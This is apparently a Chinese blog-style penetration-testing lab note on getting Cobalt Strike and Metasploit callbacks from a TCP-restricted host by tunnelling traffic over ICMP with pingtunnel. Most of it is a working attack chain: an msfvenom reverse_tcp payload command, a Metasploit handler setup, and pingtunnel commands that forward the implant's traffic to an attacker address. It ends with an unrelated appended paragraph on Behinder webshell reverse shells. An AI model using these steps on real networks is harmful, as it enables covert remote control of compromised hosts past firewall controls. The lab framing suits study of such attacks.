内网安全-不出网隧道上线

知识点

隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)使用点——两个主机之间可以正常通信,但是因为防火墙配置或是某些原因无法通信

代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)使用点——两个主机之间无法正常通信,通过一个中间的服务器或是设备进行通信

连接方向:正向&反向

实验

CS-ICMP-上线 端口与协议限制

解决问题:解决渗透过程中,因为防火墙或是其他原因无法链接到目标主机的情况。控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。

思路:ICMP隧道技术,在目标服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息。

CS:

后门生成,生成后门的地址依旧为本地地址,端口为3333

两个http地址都可以填写127.0.0.1

简单理解:因为TCP流量限制无法出网,那么执行后门时让其在本地执行,流量自然不会被限制,再利用脚本转发到icmp协议

ame: 为监听器名字,可任意

HTTP Hosts:  进行回连的主机(shell反弹的主机),也就是我们kali的ip(如果是阿里云,则填阿里云主机的公网ip),可以设置多个

HTTP Hosts(Stager):  Stager的马请求下载payload的地址(一般也是和上面的ip填一样)

HTTP Port(C2): payload回连的端口

 

 

在kali上运行pingtunnel脚本,用来开启隧道

 

在目标主机上运行一下代码,让流量从TCP转到ICMP,并从本地的3333端口转到36.128的7777端口

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.36.128 -t 192.168.36.128:7777 -tcp 1 -noprint 1 -nolog 1

 

在cs上布置监听器。分别监听3333和7777端口

 

运行脚本,cs成功上线,并且发现上线的监听器名称为mz,而mz就是监听的7777端口,及实验成功。 

 

 

CS-ICMP-上线 端口与协议限制

思路:与cs一致,不在细讲

生成后门:生成时必须本地,因为目标如果禁止tcp链接的木马,无论是出站还是入站脚本都无法链接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > mz.exe

 

MSF启动监听:因为利用隧道将脚本的端口改为4444,所以需要监听4444端口,监听ip直接设置为任何ip或是特定ip都可

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 4444

exploit

 

Kali开启隧道:

./pingtunnel -type server

 

被攻击服务器:Win开启隧道 //将本地3333 icmp协议数据转发至128ip的4444流量上(管理员运行)

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.36.128:4444 -tcp 1 -noprint 1 -nolog 1

被攻击服务器:在执行木马即可

发现4444端口成功监听到信息,实验成功

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
冰蝎客户端提供了两种反弹Shell的方式,常规Shell和Meterpreter。常规Shell是一种基本的反弹Shell方式,它可以通过与目标主机建立连接来执行命令和控制目标主机。而Meterpreter是一种更高级的反弹Shell,它与metasploit框架无缝对接,可以提供更多功能和灵活性。 冰蝎还提供了虚拟终端功能,它可以通过一句话木马的Socks代理功能实现内网穿透的能力。这意味着在shell环境下进行的操作可以在内网环境下进行,同时使用起来也非常简单高效。 因此,冰蝎客户端可以通过常规Shell或Meterpreter反弹Shell的方式进行不出的操作。同时,它还提供了虚拟终端功能来实现内网穿透。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [冰蝎 连接木马到反弹shell拿到权限全过程](https://blog.csdn.net/hackzkaq/article/details/110122723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [基于流量侧检测冰蝎webshell交互通讯](https://blog.csdn.net/qq_36334464/article/details/99978193)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值